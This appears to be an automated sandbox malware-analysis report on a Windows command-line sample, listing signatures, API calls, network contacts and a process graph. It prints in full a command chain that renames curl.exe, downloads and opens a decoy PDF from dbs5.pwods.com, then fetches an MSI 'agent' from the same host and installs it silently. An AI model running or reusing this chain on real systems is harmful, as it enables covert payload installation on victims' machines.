Windows Analysis Report

Overview

General Information

Analysis ID: 1528038
Infos:

Detection

Score: 8
Range: 0 - 100
Whitelisted: false
Confidence: 60%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00103EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 3_2_00103EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F820 CryptAcquireContextA,CryptCreateHash, 3_2_0010F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 3_2_0010F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_0010F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 3_2_0010EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00106400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 3_2_00106400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00106591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00106591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 3_2_0010C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C730 CryptHashData, 3_2_0010C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_0010C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: -----BEGIN PUBLIC KEY----- 3_2_000E77F7
Source: TNheBOJElq.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DDB77 recv,WSAGetLastError, 3_2_000DDB77
Source: global traffic HTTP traffic detected: GET /download/pdf HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /download/agent HTTP/1.1Host: dbs5.pwods.comUser-Agent: curl/7.83.1Accept: */*
Source: TNheBOJElq.exe String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.dr String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: dbs5.pwods.com
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071765607.0000000000130000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: TNheBOJElq.exe, 00000004.00000002.2071871975.0000000002D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dbs5.pwods.com/download/agent
Source: TNheBOJElq.exe, 00000003.00000002.2055325705.0000000002A58000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053825085.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000003.2053256528.0000000002A85000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000003.00000002.2055431756.0000000002A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dbs5.pwods.com/download/pdf
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.209.119.17:443 -> 192.168.2.5:49709 version: TLS 1.2
Detected potential crypto function
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000D1535 3_2_000D1535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000FA8D8 3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000CE127 3_2_000CE127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DA9B3 3_2_000DA9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000EC1FD 3_2_000EC1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010CAA0 3_2_0010CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DFAEC 3_2_000DFAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_001133B0 3_2_001133B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000D4415 3_2_000D4415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000E25B8 3_2_000E25B8
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000DD6AD appears 302 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000C913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D20E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000DD632 appears 246 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D2564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 000D251E appears 48 times
Source: classification engine Classification label: clean8.win@11/3@1/2
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000C310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 3_2_000C310D
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2764:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf & "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.2040331928.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.2071726644.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.2056241857.0000000000115000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_000DD33A
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DCEEF push edi; retn 000Dh 3_2_000DCEF0
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe API coverage: 8.3 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: TNheBOJElq.exe, 00000004.00000003.2071234434.0000000002F60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: TNheBOJElq.exe, 00000003.00000003.2053382620.0000000002A60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll||
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0011155B
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DD33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_000DD33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00110CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00110CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0011155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0011155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_001116BE SetUnhandledExceptionFilter, 3_2_001116BE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Gloza\AppData\Local\Temp\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\Users\Gloza\Documents\QMQjaBdqIo.pdf" https://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi https://dbs5.pwods.com/download/agent Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\users\gloza\appdata\local\temp\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\users\gloza\documents\qmqjabdqio.pdf" https://dbs5.pwods.com/download/pdf & "c:\users\gloza\documents\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi https://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0011137A cpuid 3_2_0011137A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00111775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_00111775
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_0010699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 3_2_0010699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000FA8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 3_2_000FA8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000F8490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 3_2_000F8490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_000DDEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 3_2_000DDEDF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528038 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 07/10/2024 Architecture: WINDOWS Score: 8 22 dbs5.pwods.com 2->22 6 cmd.exe 2 2->6         started        9 msiexec.exe 2->9         started        process3 file4 20 C:\Program Files (x86)\...\TNheBOJElq.exe, PE32 6->20 dropped 11 TNheBOJElq.exe 1 6->11         started        14 TNheBOJElq.exe 2 6->14         started        16 conhost.exe 6->16         started        18 2 other processes 6->18 process5 dnsIp6 24 dbs5.pwods.com 8.209.119.17, 443, 49706, 49709 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 11->24 26 127.0.0.1 unknown unknown 11->26
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
8.209.119.17
 dbs5.pwods.com Singapore
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
dbs5.pwods.com 8.209.119.17 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://dbs5.pwods.com/download/pdf false
    		unknown
    https://dbs5.pwods.com/download/agent false
      		unknown